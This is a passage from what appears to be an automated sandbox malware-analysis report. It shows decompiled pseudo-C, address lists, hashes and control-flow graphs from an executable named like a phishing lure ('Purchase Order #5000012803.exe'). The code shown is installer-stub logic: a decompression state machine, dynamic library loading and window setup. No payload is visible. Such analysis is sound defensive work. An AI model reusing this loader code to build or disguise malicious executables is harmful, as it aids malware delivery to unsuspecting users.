                      								__eax = (__eflags >= 0) - 1 + 0xa;
                      								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                      								__eax =  *(__ebp - 4);
                      								__eax =  *(__ebp - 4) + 0x664;
                      								__eflags = __eax;
                      								 *(__ebp - 0x58) = __eax;
                      								goto L68;
                      							}
                      							__eax =  *(__ebp - 4);
                      							__ecx =  *(__ebp - 0x38);
                      							 *(__ebp - 0x84) = 8;
                      							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                      							goto L132;
                      						case 8:
                      							__eflags =  *(__ebp - 0x40);
                      							if( *(__ebp - 0x40) != 0) {
                      								__eax =  *(__ebp - 4);
                      								__ecx =  *(__ebp - 0x38);
                      								 *(__ebp - 0x84) = 0xa;
                      								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                      							} else {
                      								__eax =  *(__ebp - 0x38);
                      								__ecx =  *(__ebp - 4);
                      								__eax =  *(__ebp - 0x38) + 0xf;
                      								 *(__ebp - 0x84) = 9;
                      								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                      								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                      							}
                      							goto L132;
                      						case 9:
                      							__eflags =  *(__ebp - 0x40);
                      							if( *(__ebp - 0x40) != 0) {
                      								goto L89;
                      							}
                      							__eflags =  *(__ebp - 0x60);
                      							if( *(__ebp - 0x60) == 0) {
                      								goto L171;
                      							}
                      							__eax = 0;
                      							__eflags =  *(__ebp - 0x38) - 7;
                      							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                      							__eflags = _t258;
                      							0 | _t258 = _t258 + _t258 + 9;
                      							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                      							goto L75;
                      						case 0xa:
                      							__eflags =  *(__ebp - 0x40);
                      							if( *(__ebp - 0x40) != 0) {
                      								__eax =  *(__ebp - 4);
                      								__ecx =  *(__ebp - 0x38);
                      								 *(__ebp - 0x84) = 0xb;
                      								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                      								goto L132;
                      							}
                      							__eax =  *(__ebp - 0x28);
                      							goto L88;
                      						case 0xb:
                      							__eflags =  *(__ebp - 0x40);
                      							if( *(__ebp - 0x40) != 0) {
                      								__ecx =  *(__ebp - 0x24);
                      								__eax =  *(__ebp - 0x20);
                      								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                      							} else {
                      								__eax =  *(__ebp - 0x24);
                      							}
                      							__ecx =  *(__ebp - 0x28);
                      							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                      							L88:
                      							__ecx =  *(__ebp - 0x2c);
                      							 *(__ebp - 0x2c) = __eax;
                      							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                      							L89:
                      							__eax =  *(__ebp - 4);
                      							 *(__ebp - 0x80) = 0x15;
                      							__eax =  *(__ebp - 4) + 0xa68;
                      							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                      							goto L68;
                      						case 0xc:
                      							L99:
                      							__eflags =  *(__ebp - 0x6c);
                      							if( *(__ebp - 0x6c) == 0) {
                      								 *(__ebp - 0x88) = 0xc;
                      								goto L170;
                      							}
                      							__ecx =  *(__ebp - 0x70);
                      							__eax =  *(__ebp - 0xc);
                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							_t334 = __ebp - 0x70;
                      							 *_t334 =  *(__ebp - 0x70) + 1;
                      							__eflags =  *_t334;
                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							__eax =  *(__ebp - 0x2c);
                      							goto L101;
                      						case 0xd:
                      							goto L36;
                      						case 0xe:
                      							goto L45;
                      						case 0xf:
                      							goto L57;
                      						case 0x10:
                      							L109:
                      							__eflags =  *(__ebp - 0x6c);
                      							if( *(__ebp - 0x6c) == 0) {
                      								 *(__ebp - 0x88) = 0x10;
                      								goto L170;
                      							}
                      							__ecx =  *(__ebp - 0x70);
                      							__eax =  *(__ebp - 0xc);
                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							_t365 = __ebp - 0x70;
                      							 *_t365 =  *(__ebp - 0x70) + 1;
                      							__eflags =  *_t365;
                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							goto L111;
                      						case 0x11:
                      							L68:
                      							__esi =  *(__ebp - 0x58);
                      							 *(__ebp - 0x84) = 0x12;
                      							goto L132;
                      						case 0x12:
                      							__eflags =  *(__ebp - 0x40);
                      							if( *(__ebp - 0x40) != 0) {
                      								__eax =  *(__ebp - 0x58);
                      								 *(__ebp - 0x84) = 0x13;
                      								__esi =  *(__ebp - 0x58) + 2;
                      								goto L132;
                      							}
                      							__eax =  *(__ebp - 0x4c);
                      							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                      							__ecx =  *(__ebp - 0x58);
                      							__eax =  *(__ebp - 0x4c) << 4;
                      							__eflags = __eax;
                      							__eax =  *(__ebp - 0x58) + __eax + 4;
                      							goto L130;
                      						case 0x13:
                      							__eflags =  *(__ebp - 0x40);
                      							if( *(__ebp - 0x40) != 0) {
                      								_t469 = __ebp - 0x58;
                      								 *_t469 =  *(__ebp - 0x58) + 0x204;
                      								__eflags =  *_t469;
                      								 *(__ebp - 0x30) = 0x10;
                      								 *(__ebp - 0x40) = 8;
                      								L144:
                      								 *(__ebp - 0x7c) = 0x14;
                      								goto L145;
                      							}
                      							__eax =  *(__ebp - 0x4c);
                      							__ecx =  *(__ebp - 0x58);
                      							__eax =  *(__ebp - 0x4c) << 4;
                      							 *(__ebp - 0x30) = 8;
                      							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                      							L130:
                      							 *(__ebp - 0x58) = __eax;
                      							 *(__ebp - 0x40) = 3;
                      							goto L144;
                      						case 0x14:
                      							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                      							__eax =  *(__ebp - 0x80);
                      							goto L140;
                      						case 0x15:
                      							__eax = 0;
                      							__eflags =  *(__ebp - 0x38) - 7;
                      							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                      							__al = __al & 0x000000fd;
                      							__eax = (__eflags >= 0) - 1 + 0xb;
                      							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                      							goto L120;
                      						case 0x16:
                      							__eax =  *(__ebp - 0x30);
                      							__eflags = __eax - 4;
                      							if(__eax >= 4) {
                      								_push(3);
                      								_pop(__eax);
                      							}
                      							__ecx =  *(__ebp - 4);
                      							 *(__ebp - 0x40) = 6;
                      							__eax = __eax << 7;
                      							 *(__ebp - 0x7c) = 0x19;
                      							 *(__ebp - 0x58) = __eax;
                      							goto L145;
                      						case 0x17:
                      							L145:
                      							__eax =  *(__ebp - 0x40);
                      							 *(__ebp - 0x50) = 1;
                      							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                      							goto L149;
                      						case 0x18:
                      							L146:
                      							__eflags =  *(__ebp - 0x6c);
                      							if( *(__ebp - 0x6c) == 0) {
                      								 *(__ebp - 0x88) = 0x18;
                      								goto L170;
                      							}
                      							__ecx =  *(__ebp - 0x70);
                      							__eax =  *(__ebp - 0xc);
                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							_t484 = __ebp - 0x70;
                      							 *_t484 =  *(__ebp - 0x70) + 1;
                      							__eflags =  *_t484;
                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							L148:
                      							_t487 = __ebp - 0x48;
                      							 *_t487 =  *(__ebp - 0x48) - 1;
                      							__eflags =  *_t487;
                      							L149:
                      							__eflags =  *(__ebp - 0x48);
                      							if( *(__ebp - 0x48) <= 0) {
                      								__ecx =  *(__ebp - 0x40);
                      								__ebx =  *(__ebp - 0x50);
                      								0 = 1;
                      								__eax = 1 << __cl;
                      								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                      								__eax =  *(__ebp - 0x7c);
                      								 *(__ebp - 0x44) = __ebx;
                      								goto L140;
                      							}
                      							__eax =  *(__ebp - 0x50);
                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                      							__eax =  *(__ebp - 0x58);
                      							__esi = __edx + __eax;
                      							 *(__ebp - 0x54) = __esi;
                      							__ax =  *__esi;
                      							__edi = __ax & 0x0000ffff;
                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      							__eflags =  *(__ebp - 0xc) - __ecx;
                      							if( *(__ebp - 0xc) >= __ecx) {
                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      								__cx = __ax;
                      								__cx = __ax >> 5;
                      								__eax = __eax - __ecx;
                      								__edx = __edx + 1;
                      								__eflags = __edx;
                      								 *__esi = __ax;
                      								 *(__ebp - 0x50) = __edx;
                      							} else {
                      								 *(__ebp - 0x10) = __ecx;
                      								0x800 = 0x800 - __edi;
                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                      								 *__esi = __cx;
                      							}
                      							__eflags =  *(__ebp - 0x10) - 0x1000000;
                      							if( *(__ebp - 0x10) >= 0x1000000) {
                      								goto L148;
                      							} else {
                      								goto L146;
                      							}
                      						case 0x19:
                      							__eflags = __ebx - 4;
                      							if(__ebx < 4) {
                      								 *(__ebp - 0x2c) = __ebx;
                      								L119:
                      								_t393 = __ebp - 0x2c;
                      								 *_t393 =  *(__ebp - 0x2c) + 1;
                      								__eflags =  *_t393;
                      								L120:
                      								__eax =  *(__ebp - 0x2c);
                      								__eflags = __eax;
                      								if(__eax == 0) {
                      									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                      									goto L170;
                      								}
                      								__eflags = __eax -  *(__ebp - 0x60);
                      								if(__eax >  *(__ebp - 0x60)) {
                      									goto L171;
                      								}
                      								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                      								__eax =  *(__ebp - 0x30);
                      								_t400 = __ebp - 0x60;
                      								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                      								__eflags =  *_t400;
                      								goto L123;
                      							}
                      							__ecx = __ebx;
                      							__eax = __ebx;
                      							__ecx = __ebx >> 1;
                      							__eax = __ebx & 0x00000001;
                      							__ecx = (__ebx >> 1) - 1;
                      							__al = __al | 0x00000002;
                      							__eax = (__ebx & 0x00000001) << __cl;
                      							__eflags = __ebx - 0xe;
                      							 *(__ebp - 0x2c) = __eax;
                      							if(__ebx >= 0xe) {
                      								__ebx = 0;
                      								 *(__ebp - 0x48) = __ecx;
                      								L102:
                      								__eflags =  *(__ebp - 0x48);
                      								if( *(__ebp - 0x48) <= 0) {
                      									__eax = __eax + __ebx;
                      									 *(__ebp - 0x40) = 4;
                      									 *(__ebp - 0x2c) = __eax;
                      									__eax =  *(__ebp - 4);
                      									__eax =  *(__ebp - 4) + 0x644;
                      									__eflags = __eax;
                      									L108:
                      									__ebx = 0;
                      									 *(__ebp - 0x58) = __eax;
                      									 *(__ebp - 0x50) = 1;
                      									 *(__ebp - 0x44) = 0;
                      									 *(__ebp - 0x48) = 0;
                      									L112:
                      									__eax =  *(__ebp - 0x40);
                      									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                      									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                      										_t391 = __ebp - 0x2c;
                      										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                      										__eflags =  *_t391;
                      										goto L119;
                      									}
                      									__eax =  *(__ebp - 0x50);
                      									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                      									__eax =  *(__ebp - 0x58);
                      									__esi = __edi + __eax;
                      									 *(__ebp - 0x54) = __esi;
                      									__ax =  *__esi;
                      									__ecx = __ax & 0x0000ffff;
                      									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                      									__eflags =  *(__ebp - 0xc) - __edx;
                      									if( *(__ebp - 0xc) >= __edx) {
                      										__ecx = 0;
                      										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                      										__ecx = 1;
                      										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                      										__ebx = 1;
                      										__ecx =  *(__ebp - 0x48);
                      										__ebx = 1 << __cl;
                      										__ecx = 1 << __cl;
                      										__ebx =  *(__ebp - 0x44);
                      										__ebx =  *(__ebp - 0x44) | __ecx;
                      										__cx = __ax;
                      										__cx = __ax >> 5;
                      										__eax = __eax - __ecx;
                      										__edi = __edi + 1;
                      										__eflags = __edi;
                      										 *(__ebp - 0x44) = __ebx;
                      										 *__esi = __ax;
                      										 *(__ebp - 0x50) = __edi;
                      									} else {
                      										 *(__ebp - 0x10) = __edx;
                      										0x800 = 0x800 - __ecx;
                      										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                      										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                      										 *__esi = __dx;
                      									}
                      									__eflags =  *(__ebp - 0x10) - 0x1000000;
                      									if( *(__ebp - 0x10) >= 0x1000000) {
                      										L111:
                      										_t368 = __ebp - 0x48;
                      										 *_t368 =  *(__ebp - 0x48) + 1;
                      										__eflags =  *_t368;
                      										goto L112;
                      									} else {
                      										goto L109;
                      									}
                      								}
                      								__ecx =  *(__ebp - 0xc);
                      								__ebx = __ebx + __ebx;
                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                      								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                      								 *(__ebp - 0x44) = __ebx;
                      								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                      									__ecx =  *(__ebp - 0x10);
                      									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                      									__ebx = __ebx | 0x00000001;
                      									__eflags = __ebx;
                      									 *(__ebp - 0x44) = __ebx;
                      								}
                      								__eflags =  *(__ebp - 0x10) - 0x1000000;
                      								if( *(__ebp - 0x10) >= 0x1000000) {
                      									L101:
                      									_t338 = __ebp - 0x48;
                      									 *_t338 =  *(__ebp - 0x48) - 1;
                      									__eflags =  *_t338;
                      									goto L102;
                      								} else {
                      									goto L99;
                      								}
                      							}
                      							__edx =  *(__ebp - 4);
                      							__eax = __eax - __ebx;
                      							 *(__ebp - 0x40) = __ecx;
                      							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                      							goto L108;
                      						case 0x1a:
                      							goto L55;
                      						case 0x1b:
                      							L75:
                      							__eflags =  *(__ebp - 0x64);
                      							if( *(__ebp - 0x64) == 0) {
                      								 *(__ebp - 0x88) = 0x1b;
                      								goto L170;
                      							}
                      							__eax =  *(__ebp - 0x14);
                      							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      							__eflags = __eax -  *(__ebp - 0x74);
                      							if(__eax >=  *(__ebp - 0x74)) {
                      								__eax = __eax +  *(__ebp - 0x74);
                      								__eflags = __eax;
                      							}
                      							__edx =  *(__ebp - 8);
                      							__cl =  *(__eax + __edx);
                      							__eax =  *(__ebp - 0x14);
                      							 *(__ebp - 0x5c) = __cl;
                      							 *(__eax + __edx) = __cl;
                      							__eax = __eax + 1;
                      							__edx = 0;
                      							_t274 = __eax %  *(__ebp - 0x74);
                      							__eax = __eax /  *(__ebp - 0x74);
                      							__edx = _t274;
                      							__eax =  *(__ebp - 0x68);
                      							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                      							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      							_t283 = __ebp - 0x64;
                      							 *_t283 =  *(__ebp - 0x64) - 1;
                      							__eflags =  *_t283;
                      							 *( *(__ebp - 0x68)) = __cl;
                      							goto L79;
                      						case 0x1c:
                      							while(1) {
                      								L123:
                      								__eflags =  *(__ebp - 0x64);
                      								if( *(__ebp - 0x64) == 0) {
                      									break;
                      								}
                      								__eax =  *(__ebp - 0x14);
                      								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      								__eflags = __eax -  *(__ebp - 0x74);
                      								if(__eax >=  *(__ebp - 0x74)) {
                      									__eax = __eax +  *(__ebp - 0x74);
                      									__eflags = __eax;
                      								}
                      								__edx =  *(__ebp - 8);
                      								__cl =  *(__eax + __edx);
                      								__eax =  *(__ebp - 0x14);
                      								 *(__ebp - 0x5c) = __cl;
                      								 *(__eax + __edx) = __cl;
                      								__eax = __eax + 1;
                      								__edx = 0;
                      								_t414 = __eax %  *(__ebp - 0x74);
                      								__eax = __eax /  *(__ebp - 0x74);
                      								__edx = _t414;
                      								__eax =  *(__ebp - 0x68);
                      								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                      								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                      								__eflags =  *(__ebp - 0x30);
                      								 *( *(__ebp - 0x68)) = __cl;
                      								 *(__ebp - 0x14) = __edx;
                      								if( *(__ebp - 0x30) > 0) {
                      									continue;
                      								} else {
                      									goto L80;
                      								}
                      							}
                      							 *(__ebp - 0x88) = 0x1c;
                      							goto L170;
                      					}
                      				}
                      			}













                      0x004068aa
                      0x00000000
                      0x004068aa
                      0x00406626
                      0x00406629
                      0x00000000
                      0x00000000
                      0x0040662f
                      0x00406633
                      0x00406636
                      0x00406636
                      0x00406636
                      0x00000000
                      0x00406636
                      0x004064b4
                      0x004064b6
                      0x004064b8
                      0x004064ba
                      0x004064bd
                      0x004064be
                      0x004064c0
                      0x004064c2
                      0x004064c5
                      0x004064c8
                      0x004064de
                      0x004064e3
                      0x0040651b
                      0x0040651b
                      0x0040651f
                      0x0040654b
                      0x0040654d
                      0x00406554
                      0x00406557
                      0x0040655a
                      0x0040655a
                      0x0040655f
                      0x0040655f
                      0x00406561
                      0x00406564
                      0x0040656b
                      0x0040656e
                      0x0040659b
                      0x0040659b
                      0x0040659e
                      0x004065a1
                      0x00406615
                      0x00406615
                      0x00406615
                      0x00000000
                      0x00406615
                      0x004065a3
                      0x004065a9
                      0x004065ac
                      0x004065af
                      0x004065b2
                      0x004065b5
                      0x004065b8
                      0x004065bb
                      0x004065be
                      0x004065c1
                      0x004065c4
                      0x004065dd
                      0x004065df
                      0x004065e2
                      0x004065e3
                      0x004065e6
                      0x004065e8
                      0x004065eb
                      0x004065ed
                      0x004065ef
                      0x004065f2
                      0x004065f4
                      0x004065f7
                      0x004065fb
                      0x004065fd
                      0x004065fd
                      0x004065fe
                      0x00406601
                      0x00406604
                      0x004065c6
                      0x004065c6
                      0x004065ce
                      0x004065d3
                      0x004065d5
                      0x004065d8
                      0x004065d8
                      0x00406607
                      0x0040660e
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00000000
                      0x00406610
                      0x00000000
                      0x00406610
                      0x0040660e
                      0x00406521
                      0x00406524
                      0x00406526
                      0x00406529
                      0x0040652c
                      0x0040652f
                      0x00406531
                      0x00406534
                      0x00406537
                      0x00406537
                      0x0040653a
                      0x0040653a
                      0x0040653d
                      0x00406544
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00000000
                      0x00406546
                      0x00000000
                      0x00406546
                      0x00406544
                      0x004064ca
                      0x004064cd
                      0x004064cf
                      0x004064d2
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004063bc
                      0x004063bc
                      0x004063c0
                      0x00406886
                      0x00000000
                      0x00406886
                      0x004063c6
                      0x004063c9
                      0x004063cc
                      0x004063cf
                      0x004063d1
                      0x004063d1
                      0x004063d1
                      0x004063d4
                      0x004063d7
                      0x004063da
                      0x004063dd
                      0x004063e0
                      0x004063e3
                      0x004063e4
                      0x004063e6
                      0x004063e6
                      0x004063e6
                      0x004063e9
                      0x004063ec
                      0x004063ef
                      0x004063f2
                      0x004063f2
                      0x004063f2
                      0x004063f5
                      0x00000000
                      0x00000000
                      0x00406639
                      0x00406639
                      0x00406639
                      0x0040663d
                      0x00000000
                      0x00000000
                      0x00406643
                      0x00406646
                      0x00406649
                      0x0040664c
                      0x0040664e
                      0x0040664e
                      0x0040664e
                      0x00406651
                      0x00406654
                      0x00406657
                      0x0040665a
                      0x0040665d
                      0x00406660
                      0x00406661
                      0x00406663
                      0x00406663
                      0x00406663
                      0x00406666
                      0x00406669
                      0x0040666c
                      0x0040666f
                      0x00406672
                      0x00406676
                      0x00406678
                      0x0040667b
                      0x00000000
                      0x0040667d
                      0x00000000
                      0x0040667d
                      0x0040667b
                      0x004068b0
                      0x00000000
                      0x00000000
                      0x00405edf

                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
                      • Instruction ID: f98c46a7d4a45b1e93054ee16d037c4b99b117d06cd84a33c86e8ff0b6c30e47
                      • Opcode Fuzzy Hash: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
                      • Instruction Fuzzy Hash: 83F18771D00229CBDF18DFA8C8946ADBBB1FF44305F25816ED856BB281D3785A86CF44
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      control_flow_graph 614 405d7c-405d90 FindFirstFileA 615 405d92-405d9b FindClose 614->615 616 405d9d 614->616 617 405d9f-405da0 615->617 616->617
                      C-Code - Quality: 100%
                      			E00405D7C(CHAR* _a4) {
                      				void* _t2;
                      
                      				_t2 = FindFirstFileA(_a4, 0x4224e8); // executed
                      				if(_t2 == 0xffffffff) {
                      					return 0;
                      				}
                      				FindClose(_t2);
                      				return 0x4224e8;
                      			}





                      APIs
                      • FindFirstFileA.KERNELBASE(?,004224E8,004218A0,0040569C,004218A0,004218A0,00000000,004218A0,004218A0,?,?,73BCF560,004053BE,?,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ,73BCF560), ref: 00405D87
                      • FindClose.KERNEL32(00000000), ref: 00405D93
                      Similarity
                      • API ID: Find$CloseFileFirst
                      • String ID: $B
                      • API String ID: 2295610775-2366330246
                      • Opcode ID: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
                      • Instruction ID: 8877f450b99b184e504413f9ffa66f4d164bf9bd4a7d07bd52ad5b53af664480
                      • Opcode Fuzzy Hash: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
                      • Instruction Fuzzy Hash: 84D012319595306BC75127386D0C84B7A59DF15331750CA33F02AF22F0D3748C518AAD
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00405DA3(signed int _a4) {
                      				struct HINSTANCE__* _t5;
                      				CHAR* _t7;
                      				signed int _t9;
                      
                      				_t9 = _a4 << 3;
                      				_t7 =  *(_t9 + 0x409218);
                      				_t5 = GetModuleHandleA(_t7);
                      				if(_t5 != 0) {
                      					L2:
                      					return GetProcAddress(_t5,  *(_t9 + 0x40921c));
                      				}
                      				_t5 = LoadLibraryA(_t7); // executed
                      				if(_t5 != 0) {
                      					goto L2;
                      				}
                      				return _t5;
                      			}







                      APIs
                      • GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                      • LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                      • GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                      Similarity
                      • API ID: AddressHandleLibraryLoadModuleProc
                      • String ID:
                      • API String ID: 310444273-0
                      • Opcode ID: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
                      • Instruction ID: 37252885b6730f192407f0687863edf929784b14cf5d3781349e011cb12c2895
                      • Opcode Fuzzy Hash: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
                      • Instruction Fuzzy Hash: F7E0C232A04610ABC6114B709D489BB77BCEFE9B41300897EF545F6290C734AC229FFA
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      control_flow_graph 108 4035e3-4035fb call 405da3 111 4035fd-40360d call 4059e3 108->111 112 40360f-403636 call 40596c 108->112 119 403659-403678 call 403897 call 405659 111->119 117 403638-403649 call 40596c 112->117 118 40364e-403654 lstrcatA 112->118 117->118 118->119 126 40367e-403683 119->126 127 4036ff-403707 call 405659 119->127 126->127 128 403685-4036a9 call 40596c 126->128 133 403715-40373a LoadImageA 127->133 134 403709-403710 call 405aa7 127->134 128->127 135 4036ab-4036ad 128->135 137 403740-403776 RegisterClassA 133->137 138 4037c9-4037d1 call 40140b 133->138 134->133 140 4036be-4036ca lstrlenA 135->140 141 4036af-4036bc call 4055a3 135->141 142 40377c-4037c4 SystemParametersInfoA CreateWindowExA 137->142 143 40388d 137->143 150 4037d3-4037d6 138->150 151 4037db-4037e6 call 403897 138->151 147 4036f2-4036fa call 405578 call 405a85 140->147 148 4036cc-4036da lstrcmpiA 140->148 141->140 142->138 145 40388f-403896 143->145 147->127 148->147 149 4036dc-4036e6 GetFileAttributesA 148->149 154 4036e8-4036ea 149->154 155 4036ec-4036ed call 4055bf 149->155 150->145 161 403864-40386c call 404ef5 151->161 162 4037e8-403805 ShowWindow LoadLibraryA 151->162 154->147 154->155 155->147 169 403886-403888 call 40140b 161->169 170 40386e-403874 161->170 163 403807-40380c LoadLibraryA 162->163 164 40380e-403820 GetClassInfoA 162->164 163->164 167 403822-403832 GetClassInfoA RegisterClassA 164->167 168 403838-403862 DialogBoxParamA call 40140b 164->168 167->168 168->145 169->143 170->150 172 40387a-403881 call 40140b 170->172 172->150
                      C-Code - Quality: 96%
                      			E004035E3() {
                      				intOrPtr _v4;
                      				intOrPtr _v8;
                      				int _v12;
                      				int _v16;
                      				char _v20;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				intOrPtr* _t20;
                      				void* _t28;
                      				void* _t30;
                      				int _t31;
                      				void* _t34;
                      				struct HINSTANCE__* _t37;
                      				int _t38;
                      				int _t42;
                      				char _t61;
                      				CHAR* _t63;
                      				signed char _t67;
                      				CHAR* _t78;
                      				intOrPtr _t80;
                      				CHAR* _t85;
                      
                      				_t80 =  *0x423eb0;
                      				_t20 = E00405DA3(6);
                      				_t87 = _t20;
                      				if(_t20 == 0) {
                      					_t78 = 0x420498;
                      					"1033" = 0x7830;
                      					E0040596C(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420498, 0);
                      					__eflags =  *0x420498;
                      					if(__eflags == 0) {
                      						E0040596C(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x420498, 0);
                      					}
                      					lstrcatA("1033", _t78);
                      				} else {
                      					E004059E3("1033",  *_t20() & 0x0000ffff);
                      				}
                      				E00403897(_t75, _t87);
                      				_t84 = "C:\\Users\\jones\\AppData\\Local\\Temp";
                      				 *0x423f20 =  *0x423eb8 & 0x00000020;
                      				if(E00405659(_t87, "C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
                      					L16:
                      					if(E00405659(_t95, _t84) == 0) {
                      						E00405AA7(0, _t78, _t80, _t84,  *((intOrPtr*)(_t80 + 0x118)));
                      					}
                      					_t28 = LoadImageA( *0x423ea0, 0x67, 1, 0, 0, 0x8040); // executed
                      					 *0x423688 = _t28;
                      					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
                      						L21:
                      						if(E0040140B(0) == 0) {
                      							_t30 = E00403897(_t75, __eflags);
                      							__eflags =  *0x423f40;
                      							if( *0x423f40 != 0) {
                      								_t31 = E00404EF5(_t30, 0);
                      								__eflags = _t31;
                      								if(_t31 == 0) {
                      									E0040140B(1);
                      									goto L33;
                      								}
                      								__eflags =  *0x42366c;
                      								if( *0x42366c == 0) {
                      									E0040140B(2);
                      								}
                      								goto L22;
